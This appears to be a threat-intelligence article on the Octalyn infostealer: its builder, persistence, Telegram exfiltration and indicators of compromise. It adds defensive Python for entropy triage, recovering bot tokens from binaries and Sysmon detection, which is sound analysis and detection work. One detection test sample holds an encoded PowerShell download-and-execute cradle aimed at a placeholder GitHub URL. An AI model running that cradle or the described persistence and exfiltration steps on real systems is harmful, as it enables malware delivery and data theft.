The Octalyn Forensic Toolkit, a publicly available GitHub project, is gaining notoriety in the cybersecurity community after a detailed technical analysis showed that its core functionality is that of a full-featured credential stealer.
Despite its self-proclaimed educational and research purposes, Octalyn exhibits all the hallmarks of a well-crafted infostealer targeting a wide range of sensitive data on Windows systems.
At its core, Octalyn pairs a C++ data-extraction payload with a Delphi-built builder utility. The builder's graphical interface lets even unskilled threat actors seamlessly generate fully functional stealer binaries.

The builder requires only a Telegram bot token and a chat ID; with those two values it configures the payload to exfiltrate harvested data live through the Telegram Bot API, which runs over HTTPS.
Modular Architecture
Technical analysis indicates that the Octalyn toolkit combines Delphi and C++ components to stay lightweight, modular, and evasive.
The builder (Build.exe) acts as the initial dropper, unpacking several heavily obfuscated executables, among them TelegramBuild.exe, rvn.exe, and assembly.exe, into the user's temporary directory.

These components rely on ordinary Windows APIs, GetTempPathA to locate the temporary directory and ShellExecuteA to launch the dropped files, so the API usage on its own is unremarkable; what stands out is the high entropy of the embedded file resources, which points to heavy packing and other anti-analysis measures.
Entropy scores above 7 bits per byte, peaking at 7.8 in some resources, indicate a deliberate effort to impede static detection and reverse engineering. The theoretical maximum for a byte stream is 8, and legitimately compressed or encrypted data scores just as high, so entropy is a triage signal to be confirmed by unpacking rather than proof of malice on its own.
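The scores quoted above are Shannon entropy in bits per byte. As an added example (not code from Cyfirma's report or the Octalyn repository), the following Python computes that value for whole files and for fixed-size windows, so a packed region stands out from the readable code and strings around it. The inputs are constructed here: readable log-style text, the same text zlib-compressed, and a uniform byte pattern standing in for a packed resource.

```python
import math
import zlib
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a single repeated value,
    8.0 for a uniform distribution over all 256 byte values."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def scan_windows(data: bytes, window: int = 512):
    """Entropy of each non-overlapping window, as (offset, entropy) pairs.
    A packed or encrypted blob inside a larger file shows up as a run of
    high-scoring windows next to low-scoring ones."""
    return [(off, shannon_entropy(data[off:off + window]))
            for off in range(0, len(data) - window + 1, window)]


# Constructed inputs (not bytes from the Octalyn samples): readable text,
# the same text zlib-compressed, and a uniform pattern standing in for a
# packed resource. BLOB glues a readable region to a packed one.
TEXT = b"".join(b"line %d: user%d@example.com logged in from 10.0.0.%d\n"
                % (i, i % 7, i % 250) for i in range(2000))
COMPRESSED = zlib.compress(TEXT, 9)
UNIFORM = bytes(range(256)) * 16
BLOB = TEXT[:4096] + UNIFORM


def triage(samples: dict, threshold: float = 7.0) -> dict:
    """Map each sample name to (entropy, flagged); flagged means the score is
    at or above the threshold used in the report. Compressed data is flagged
    too, which is the caveat: the score cannot tell packing from compression."""
    return {name: (round(shannon_entropy(blob), 2), shannon_entropy(blob) >= threshold)
            for name, blob in samples.items()}


if __name__ == "__main__":
    for name, (h, flagged) in triage({"text": TEXT, "zlib": COMPRESSED,
                                      "uniform": UNIFORM}).items():
        print(f"{name:8s} {h:.2f} {'FLAG' if flagged else 'ok'}")
    for off, h in scan_windows(BLOB, 2048):
        print(f"offset {off:5d}: {h:.2f}")
```

Run against a dropped executable's bytes, the windowed scan shows where the packed resource sits; the whole-file score alone is what the report quotes, and the zlib row shows why it needs confirmation.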
On execution, the malware prepares a well-organized working directory, named "0ctalyn", within the victim's temporary file space.
Within this directory, separate subfolders are created for cryptocurrency wallets, browser cookies, credentials, VPN configurations, Discord, and gaming accounts, and authentication data from Chrome, Edge, and Opera is systematically located, decrypted, and archived.
The cryptocurrency wallet category is further subdivided by coin and wallet type, so that private keys, configuration files, and browser-extension data arrive neatly arranged for the attacker's review.
Secondary Payload Delivery
To keep a foothold on the host, Octalyn establishes persistence through two mechanisms: it copies its payload (rvn.exe) into the Windows Startup folder and adds a value for it under the Run key in the Windows Registry.
According to Cyfirma's report, this dual approach complicates manual removal, since cleaning only one location leaves the other to relaunch the stealer, and supports long-term surveillance or exploitation.
Data exfiltration is handled almost exclusively over Telegram, with the bot token and chat ID hardcoded in the binary's resources so the bot communication works without further setup.
Once collection is finished, the harvested data is zipped by PowerShell scripts and uploaded through the Telegram Bot API over HTTPS, using structured archive names that incorporate the victim's username so the attacker can tell victims apart.
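Because the token and chat ID are embedded in the binary, they can be recovered by a strings pass. As an added example (not code from Cyfirma's report or the Octalyn repository), the following Python pulls a Telegram bot token, its numeric bot ID, the Bot API methods referenced, and any chat_id from raw file bytes, scanning ASCII and UTF-16LE strings at both alignments because Delphi and C++ Windows builds often store wide strings. The sample blob, the token and the chat ID are constructed placeholders of the right shape, not real credentials.

```python
import re

# A Telegram bot token is "<numeric bot id>:<roughly 35-character secret>";
# the Bot API is reached at https://api.telegram.org/bot<token>/<method>, and
# chat_id names the chat that receives the upload.
TOKEN_RE = re.compile(rb"(?<!\d)(\d{6,12}:[A-Za-z0-9_-]{34,36})(?![A-Za-z0-9_-])")
METHOD_RE = re.compile(rb"api\.telegram\.org/bot\d{6,12}:[A-Za-z0-9_-]{34,36}/([A-Za-z]+)")
CHAT_ID_RE = re.compile(rb'chat_id["\s]*[=:]\s*"?(-?\d{5,20})')

# Constructed stand-in for a dropped executable: an ASCII Bot API URL, a
# UTF-16LE "chat_id=" string, padding and a stray header. The token is fake.
SAMPLE = (
    b"\x00" * 16
    + b"https://api.telegram.org/bot1234567890:AAHxyzExampleSecretTokenPart0123456/sendDocument\x00"
    + b"\x00" * 8
    + "chat_id=987654321".encode("utf-16-le") + b"\x00\x00"
    + b"MZ\x90\x00"
)


def narrow_views(blob: bytes):
    """Yield the raw bytes, then the UTF-16LE content folded to ASCII at both
    byte alignments, so wide strings match the same byte regexes."""
    yield blob
    for offset in (0, 1):
        yield blob[offset:].decode("utf-16-le", errors="ignore").encode("ascii", errors="ignore")


def extract_telegram_config(blob: bytes) -> dict:
    """Collect Telegram bot tokens, bot IDs, Bot API methods and chat IDs
    found in any string view of the blob."""
    tokens, methods, chat_ids = set(), set(), set()
    for view in narrow_views(blob):
        tokens.update(m.group(1).decode() for m in TOKEN_RE.finditer(view))
        methods.update(m.group(1).decode() for m in METHOD_RE.finditer(view))
        chat_ids.update(m.group(1).decode() for m in CHAT_ID_RE.finditer(view))
    return {
        "bot_tokens": sorted(tokens),
        "bot_ids": sorted(t.split(":")[0] for t in tokens),
        "api_methods": sorted(methods),
        "chat_ids": sorted(chat_ids),
    }


if __name__ == "__main__":
    for key, values in extract_telegram_config(SAMPLE).items():
        print(f"{key:12s} {values}")
```

The bot ID and chat ID are the useful indicators: they survive rebuilds with the same bot and let an analyst tie several samples to one operator, whereas the archive names and temp paths change per victim.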
Behavioral analysis also revealed additional malicious routines, including encoded PowerShell commands that download a stage-two payload from GitHub, although the referenced files were not present at the time of investigation.
The infrastructure for hosting second-stage malware remains live, signaling clear intent and readiness for ongoing campaigns.
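The persistence mechanisms and the encoded PowerShell download described above all leave host telemetry. As an added example (not code from Cyfirma's report or the toolkit), the following Python scores Sysmon-style events for those three behaviors: a Run-key value that points into a user-writable directory, an executable dropped into the Startup folder, and a PowerShell process started with an encoded command that decodes to a download cradle. The events, the username, the SID and the stage-two URL are constructed placeholders; field names follow Sysmon's (EventID 1, 11 and 13 with Image, CommandLine, TargetFilename, TargetObject and Details).

```python
import base64
import re

# Constructed stage-two command, encoded the way PowerShell's -EncodedCommand
# expects (Base64 over UTF-16LE). The URL is a placeholder, not a real one.
STAGE2_CMD = ("IEX (New-Object Net.WebClient).DownloadString("
              "'https://raw.githubusercontent.com/EXAMPLE/EXAMPLE/main/stage2.ps1')")
ENCODED = base64.b64encode(STAGE2_CMD.encode("utf-16-le")).decode()

# Constructed Sysmon-style events: two PowerShell launches (one encoded, one
# benign), a Startup-folder drop, a Run-key value pointing into %TEMP%, and a
# benign Run-key value written by an installer under Program Files.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"EventID": 11, "Image": r"C:\Users\victim\AppData\Local\Temp\Build.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rvn.exe"},
    {"EventID": 13, "Image": r"C:\Users\victim\AppData\Local\Temp\rvn.exe",
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\rvn",
     "Details": r"C:\Users\victim\AppData\Local\Temp\rvn.exe"},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
     "Details": r"C:\Program Files\Vendor\updater.exe"},
]

RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(?:exe|lnk|bat|vbs|ps1)$", re.I)
USER_WRITABLE_RE = re.compile(r"\\(?:AppData|Temp|Users\\[^\\]+\\Downloads)\\", re.I)
# -e, -ec, -enc and -EncodedCommand all take the Base64 blob as the next argument.
ENC_ARG_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|github", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None when the command
    line carries none or the Base64 is malformed."""
    m = ENC_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError
        return None


def detect(events):
    """Return (rule, actor, detail) tuples for events matching the three
    Octalyn behaviors; benign events fall through."""
    alerts = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 13 and RUN_KEY_RE.search(ev["TargetObject"]) \
                and USER_WRITABLE_RE.search(ev.get("Details", "")):
            alerts.append(("run_key_persistence", ev["TargetObject"], ev["Details"]))
        elif eid == 11 and STARTUP_RE.search(ev["TargetFilename"]):
            alerts.append(("startup_folder_drop", ev["Image"], ev["TargetFilename"]))
        elif eid == 1 and ev["Image"].lower().endswith("powershell.exe"):
            decoded = decode_encoded_command(ev["CommandLine"])
            if decoded and CRADLE_RE.search(decoded):
                alerts.append(("encoded_powershell_download", ev["Image"], decoded))
    return alerts


if __name__ == "__main__":
    for rule, actor, detail in detect(EVENTS):
        print(f"{rule:28s} {actor}\n{'':28s} {detail}")
```

The Run-key rule keys on the destination path rather than the key itself because installers write Run values legitimately; restricting alerts to values that point into AppData, Temp or Downloads keeps the rule quiet on a normal fleet while still catching a payload launched from the temporary directory.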
Octalyn’s potent blend of ease of deployment, attention to anti-analysis, and broad targeting (notably, financial and cryptocurrency data) underlines its appeal for cybercriminal operations.
While positioned as a digital forensic utility, its practical features align with those found in established infostealers, raising red flags about potential large-scale abuse.
Ongoing maintenance of the associated GitHub repositories and Telegram bot infrastructure indicates persistence and active development by the threat actor.
Security teams are urged to monitor for the following indicators of compromise in network and endpoint environments.
Indicators of Compromise (IOC)
| S. No | Indicator | Type | Context |
|---|---|---|---|
| 1 | 8bd9925f7b7663ca2fcb305870248bd5de0c684342c364c24ef24bffbcdecd8b | EXE | Octalynstealer.exe |
| 2 | 3b3a096a9c507529919f92154f682490fa8e135f3460549a917cf23113a7b828 | DLL | Build.exe |
| 3 | 8bb868a4bd9ed5e540c3d6717b0baa1cd831fc520ee02889bc55e2aac66d9d34 | EXE | rvn.exe |
| 4 | cea94fd48ef98f6e9db120cdb33fa1099846ebcf9e6d6f8de3b53250d2087f0a | EXE | asembly.exe |
| 5 | 8af7fc21bc9c13d877f598886f363a4c7c1105bcda18e17db74d7e1584a9cae2 | EXE | TelegramBuild.exe |
| 6 | abe96669d90f52529b5dad847f43961a4b8b56c3893f6233a404b688c5a6069e | EXE | svchost.exe |
| 7 | 44778cf0de10af616ef2d8a5cc5048f7cf0faa204563eab590a1a9ea4a168ef7 | EXE | binder.exe |